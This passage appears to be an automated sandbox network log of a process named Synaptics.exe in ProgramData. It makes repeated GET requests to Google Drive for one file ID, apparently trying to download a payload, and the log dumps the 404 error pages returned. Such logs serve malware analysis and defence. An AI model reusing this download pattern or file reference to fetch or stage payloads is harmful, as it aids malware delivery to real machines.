                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Qe04uH6CxBwTc41mXccaew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        2192.168.2.549714142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:22 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:22 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-YLUm3oMG1uB-HBIJ1IJRPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        3192.168.2.549717142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:22 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-12-30 10:46:23 UTC1602INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC5jEhBcWx3sRRM4WZuFl_r-sXa1SCE-JtoxSHHzZ_dDCkofAOrf1X5kSKU5lp7ru2-r5OIj91w
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:23 GMT
                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-BfyCk6bHpOewH1saaVnLVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Set-Cookie: NID=520=BBE26vPeC2hszqsXJ1ynrQW_9kLsZpsHYQPDP6eN2y2zdlFo-23O9GeRsAmPENzIlI7naznndqiKAzIJmuZItjQAXwfSAfPPnvZybJ9AaZfi_PUMO8gtrIeAc_xFc3PJOBW4tiY_9Etp3P_tRX_kZ_fi85pZ8xHBt0DyAqqJlwGZY_uPHd-1V5ba; expires=Tue, 01-Jul-2025 10:46:23 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:23 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 57 4e 74 6b 72 43 4f 4d 63 6c 7a 4a 7a 7a 57 6e 68 47 6f 51 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0WNtkrCOMclzJzzWnhGoQQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                        2024-12-30 10:46:23 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        4192.168.2.549716142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:22 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:23 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DkgbwxGl8_jgbqhD2OQGpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        5192.168.2.549715142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:22 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-12-30 10:46:23 UTC1602INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC5PqNcK1rReNjhVhnt2YfE2vXAFa4Su6ooWKO68EeyIYFcOUzZ96bepjVF7_Pgfpyvw8fBohTU
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:23 GMT
                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-y1gv4eopPdMqwlpUe6prDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Set-Cookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs; expires=Tue, 01-Jul-2025 10:46:23 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:23 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 78 76 31 46 50 74 76 50 4f 59 58 2d 35 54 44 30 44 49 75 53 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hxv1FPtvPOYX-5TD0DIuSA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                        2024-12-30 10:46:23 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        6192.168.2.549719142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:23 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:23 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-3iRJdEkbyrbo_Hl0aGE2qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        7192.168.2.549720142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:23 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:24 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-12j_YRRyxMBeDMsReuR2rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        8192.168.2.549721142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:23 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-12-30 10:46:24 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC7KL3WGOmHGwIlJfUTtBVGOya9N_kCo6q9qyMXNpWiNXcfDUh72JcWtvOAuSnICovmZ
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:24 GMT
                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-QHIHeyzzJ3QW49Q7PNz5ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Set-Cookie: NID=520=AjF33IdaeUNmHlmeyv_rklrZSnVFv8lgySmei1Dsqdy2rFxSjjfnAO-cl39aHo2JrrTKdNoIFV6ku8M9RkVKkd4wDR3j0NCN6DfoPbxsWlGAYN6sqEfJqKWWg0zy5MERV4xjBejEASTfCcn004MOi4zjgfmGet7SvpsNHYPAqhjQfvoi6GZ98aQ; expires=Tue, 01-Jul-2025 10:46:24 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:24 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 46 79 53 59 58 32 70 53 54 54 56 63 6d 31 4e 43 78 66 6e 6a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RFySYX2pSTTVcm1NCxfnjw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                        2024-12-30 10:46:24 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        9192.168.2.549722142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:24 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-12-30 10:46:24 UTC1601INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC7Gn29z9D7JZU6RY8EDTBJ9ct_1-Ddi2pR44YfZC2hYrMVLuB34PLL_5mjRm-YdbBGQzCt50gs
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:24 GMT
                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-WztmJEkd3N1en903BUi2SQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Set-Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg; expires=Tue, 01-Jul-2025 10:46:24 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:24 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 49 72 52 4f 62 52 4c 48 50 4a 5f 33 46 39 42 67 4a 4b 63 4d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0IrRObRLHPJ_3F9BgJKcMA">*{margin:0;padding:0}html,code{font:15px/22px arial
